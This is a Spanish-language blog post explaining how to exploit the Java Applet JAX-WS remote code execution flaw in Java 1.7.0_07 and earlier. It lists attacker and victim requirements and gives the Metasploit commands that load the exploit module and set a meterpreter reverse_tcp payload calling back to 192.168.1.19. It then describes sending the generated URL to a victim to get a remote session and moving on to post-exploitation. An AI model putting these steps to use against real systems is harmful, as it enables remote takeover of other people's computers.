J2TEAM Security: A must-have extension for Chrome users. Install now!

Exploiting Java Applet JAX-WS Remote Code Execution

Exploiting Java Applet JAX-WS Remote Code Execution | Juno_okyo's Blog

Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada Java Applet JAX-WS Remote Code Execution descubierta por @_juan_vazquez_ la cual afecta a la versión 1.7.0_07-b10 y anteriores.
El exploit respectivo para aprovecharse de esta vulnerabilidad se encuentra respectivamente en los modulos de Metasploit y se puede utilizar con tal solo realizar un msfupdate.
El modulo disponible en Metasploit para esta vulnerabilidad se aprovecha de los JAX-WS classes desde un Java Applet para ejecutar código arbitrario Java.
Los procedimientos y requerimientos para explotar esta vulnerabilidad son muy simples, solo basta con tener BackTrack y un Sistema Virtual para realizar las pruebas.

REQUERIMIENTOS:

Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 (Victima)
Google Chorme, Firefox o IE (Victima)


PROCEDIMIENTO DEL ATAQUE:

Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:
------------------------------------------------------------------------------------------------------------------
use exploit/multi/browser/java_jre17_jaxws
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.19
set TARGET 1
set LHOST 192.168.1.19
exploit
------------------------------------------------------------------------------------------------------------------



Como ya es de conocimiento y costumbre, estos comandos creara una URL que sera enviada a al usuario para que lo ejecute desde cualquier navegador web, ya sea Google Chorme, Firefox, Internet Explorer u Opera que contenga la version del Java vulnerable 1.7.0_07-b10 y anteriores.

Seguidamente si el usuario logra ejecutar la URL generada en cualquier Sistema Operativo o Navegador, lograremos obtener una session metepreter como se aprecia en la siguiente imagen:

Por lo tanto, solo quedaría ejecutar los respectivos comandos de Explotación y Post-Explotacion para aprovecharnos del sistema que hemos vulnerable con una simple URL gracias a este nuevo exploit recién salida del horno.



VIDEO-TUTORIAL:

Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!